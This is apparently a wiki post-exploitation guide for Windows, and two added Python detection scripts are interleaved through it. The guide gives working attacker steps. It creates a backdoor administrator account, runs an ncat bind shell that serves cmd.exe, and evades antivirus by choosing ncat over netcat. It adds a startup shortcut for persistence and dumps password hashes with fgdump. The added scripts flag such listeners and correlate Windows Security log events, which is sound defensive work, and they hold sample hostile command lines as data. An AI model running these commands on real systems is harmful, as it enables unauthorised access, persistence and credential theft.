Windows

We've gotten our exploit to work on the box, now what? Whatever you do, please do not hit CTRL-C!

First things first, you want to maintain access to the system, so you should try to do a few different things:

1. Create an administrator account on the machine.
2. Create a backdoor listener.

Second, you want to pilfer as much data from this machine as possible.

1. Grab password hashes.
2. Find useful information in the machine that you can leverage to gain access to another box.

Create a user and add them to the local administrator group.

net user username password /add

net localgroup administrators username /add

Create a backdoor listener

This can be a little more challenging than it sounds. Normally, you could just upload netcat and tell it to listen, but most AV clients will flag it as a "hacktool" and will not let the file onto the box. However, Nmap is distributed with a file called ncat.exe, which usually is not picked up by AV. Once you've uploaded ncat.exe to the host (there are numerous ways to do this; I can't go into all of them, but try an open file share, connecting to FTP, etc.), run the following command:

ncat -l -p <port number> -e cmd.exe -k

The command breaks down like this:
-l puts ncat in listen mode
-p tells ncat which port to listen on
-e tells ncat to execute this program for whoever connects on that port
-k tells ncat to keep listening after a client disconnects, so it accepts more than one connection

There are fancier and more elaborate setups, but this will get you in and keep letting you in until the box reboots.

You may want to add a startup shortcut that runs this command at boot so that you retain access after a reboot.
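The listener and the startup shortcut described above are both visible to endpoint telemetry: the listener as a process-creation command line (Sysmon event 1, or Security event 4688 with command-line auditing enabled) and the shortcut as something that runs from a Startup folder. The following is an added example, not code from the original page or from the Nmap project: a small Python classifier that parses a command line the way the flag breakdown above describes it (-l, -p, -e, -k, plus the long forms and bundled short flags such as -lk), flags a netcat-style binary that is listening and handing out a program, and separately flags images that live in a Startup folder. The record field names (Image, CommandLine) and the sample records are constructed for this example.

```python
# Added example, not from the original page: flag process-creation records
# whose command line starts a netcat-style listener that executes a program
# for each client, and image paths that run from a Windows Startup folder.
import re
import shlex

NETCAT_BINARIES = {"ncat", "nc", "netcat"}
LISTEN_FLAGS = {"-l", "--listen"}
KEEP_FLAGS = {"-k", "--keep-open"}
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}
# Both the per-user and the all-users Startup folders end in this path.
STARTUP_FOLDER_RE = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)


def _binary_name(token):
    """'"C:\\Tools\\ncat.exe"' -> 'ncat' (quotes, directory and .exe dropped)."""
    name = token.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def _expand_short_flags(argv):
    """Split bundled short flags such as '-lk' or '-lp' into '-l', '-k', ..."""
    out = []
    for tok in argv:
        if re.fullmatch(r"-[lkpuvn]{2,}", tok):
            out.extend("-" + c for c in tok[1:])
        else:
            out.append(tok)
    return out


def classify_listener(cmdline):
    """Return a dict describing a netcat-style listener, or None when the
    command line is not a netcat binary running in listen mode."""
    try:
        argv = shlex.split(cmdline, posix=False)  # Windows style: keep backslashes
    except ValueError:
        return None
    if not argv or _binary_name(argv[0]) not in NETCAT_BINARIES:
        return None
    argv = _expand_short_flags(argv)
    info = {"listen": False, "keep_open": False, "exec": None, "port": None}
    i = 1
    while i < len(argv):
        tok = argv[i]
        nxt = argv[i + 1] if i + 1 < len(argv) else None
        if tok in LISTEN_FLAGS:
            info["listen"] = True
        elif tok in KEEP_FLAGS:
            info["keep_open"] = True
        elif tok in EXEC_FLAGS and nxt is not None:
            info["exec"] = nxt.strip('"')
            i += 1
        elif tok == "-p" and nxt is not None and nxt.isdigit():
            info["port"] = int(nxt)
            i += 1
        elif tok.isdigit() and info["port"] is None:
            info["port"] = int(tok)  # bare port argument, as in "ncat -l 4444"
        i += 1
    return info if info["listen"] else None


def is_startup_folder_path(path):
    """True for anything under a '...\\Start Menu\\Programs\\Startup\\' folder."""
    return bool(STARTUP_FOLDER_RE.search(path))


def scan_process_events(events):
    """events: iterable of {'Image': ..., 'CommandLine': ...} records (the
    shape of Sysmon event 1 / Security 4688 with command-line auditing on).
    Returns one alert dict per matching condition."""
    alerts = []
    for ev in events:
        listener = classify_listener(ev.get("CommandLine", ""))
        if listener and listener["exec"]:
            alerts.append({"image": ev["Image"], "reason": "listener executes a program", **listener})
        if is_startup_folder_path(ev.get("Image", "")):
            alerts.append({"image": ev["Image"], "reason": "runs from Startup folder"})
    return alerts


# Constructed sample records for a stand-alone run (not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe -l"},
    {"Image": r"C:\Users\Public\ncat.exe", "CommandLine": "ncat -l -p 4444 -e cmd.exe -k"},
    {"Image": r"C:\Users\Public\ncat.exe", "CommandLine": r'"C:\Users\Public\ncat.exe" -lk 4444 -e cmd.exe'},
    {"Image": r"C:\Users\Public\ncat.exe", "CommandLine": "ncat 10.0.0.5 443"},
]

if __name__ == "__main__":
    for alert in scan_process_events(SAMPLE_PROCESS_EVENTS):
        print(alert)
```

The outbound connection in the last sample record is deliberately not flagged: the classifier keys on listen mode combined with an exec flag, which is the shape of the command on this page, rather than on the presence of the binary alone. A renamed ncat.exe defeats the binary-name check, which is why real deployments pair this with file hashes or the listening-socket view (Sysmon event 3 or netstat output).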

Getting password hashes

There are several ways to get password hashes off a machine once we've gotten root/system access. You can upload a meterpreter executable and have it pull the hashes. You can use a password dumping program like FGDump or PWDump3. I'll go into FGDump, because that's my tool of choice in these situations.

FGDump can be found at http://www.foofus.net/fizzgig/fgdump/

Once we've created an account in the local administrators group on the box, we can pull the hashes off the machine remotely. We do not have to upload the file and run it locally.

The command is:

fgdump.exe -h 127.0.0.1 -u AnAdministrativeUser
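Both halves of this page leave one correlated trail in the Windows Security log on the target: the account creation at the top (net user ... /add) logs event 4720, the group change (net localgroup administrators ... /add) logs event 4732, and a remote hash dump that authenticates with that account produces a network logon, event 4624 with LogonType 3. The following is an added example, not code from the original page or from the FGDump project: a Python correlation that reports any account created and added to Administrators within a short window, and rates the finding higher when that account is then used for a network logon. The record field names and the sample events are constructed for this example; a real 4732 record carries the member as a SID, which would be resolved to a name first.

```python
# Added example, not from the original page: correlate Windows Security log
# events for a local account that is created, added to the local
# Administrators group, and then used for a network logon within a window.
# Security event IDs used: 4720 = user account created, 4732 = member added
# to a security-enabled local group, 4624 = successful logon (LogonType 3 =
# network logon, which is what a remote SMB-based tool produces on the target).
from datetime import datetime, timedelta

# Constructed sample records. Field names follow the Security log loosely; a
# real 4732 record identifies the member by SID (MemberSid), which you would
# resolve to a name before running this correlation.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Time": "2024-05-01T10:00:00", "TargetUserName": "alice",
     "LogonType": 2, "IpAddress": "-"},
    {"EventID": 4720, "Time": "2024-05-01T10:01:10", "TargetUserName": "username",
     "SubjectUserName": "SYSTEM"},
    {"EventID": 4732, "Time": "2024-05-01T10:01:12", "MemberName": "username",
     "TargetUserName": "Administrators", "SubjectUserName": "SYSTEM"},
    {"EventID": 4624, "Time": "2024-05-01T10:04:30", "TargetUserName": "username",
     "LogonType": 3, "IpAddress": "10.0.0.5"},
    {"EventID": 4720, "Time": "2024-05-01T14:00:00", "TargetUserName": "newhire",
     "SubjectUserName": "helpdesk"},
]


def _ts(event):
    return datetime.fromisoformat(event["Time"])


def _name(event, field):
    return event.get(field, "").lower()


def find_new_admin_abuse(events, window=timedelta(minutes=10)):
    """Return one finding per account that was created and added to the local
    Administrators group within `window` of its creation; the finding is rated
    high when the account also performed a network logon inside that window."""
    events = sorted(events, key=_ts)
    findings = []
    for created in events:
        if created["EventID"] != 4720:
            continue
        user = _name(created, "TargetUserName")
        start, end = _ts(created), _ts(created) + window
        added = logon = None
        for later in events:
            if not (start <= _ts(later) <= end):
                continue
            if (later["EventID"] == 4732 and _name(later, "MemberName") == user
                    and _name(later, "TargetUserName") == "administrators"):
                added = added or later
            elif (later["EventID"] == 4624 and _name(later, "TargetUserName") == user
                    and later.get("LogonType") == 3):
                logon = logon or later
        if added is None:
            continue  # an account creation alone is routine; the group change is the tell
        findings.append({
            "user": created["TargetUserName"],
            "created_by": created.get("SubjectUserName"),
            "created_at": created["Time"],
            "added_to_admins_at": added["Time"],
            "network_logon_at": logon["Time"] if logon else None,
            "network_logon_from": logon.get("IpAddress") if logon else None,
            "severity": "high" if logon else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in find_new_admin_abuse(SAMPLE_EVENTS):
        print(finding)
```

The window is the important tuning knob: a help-desk account creation followed by a group change hours later is normal provisioning, whereas creation, elevation and a network logon inside a few minutes, all performed by SYSTEM rather than an administrator's own account, is the shape this page describes.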

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-Share Alike 2.5 License.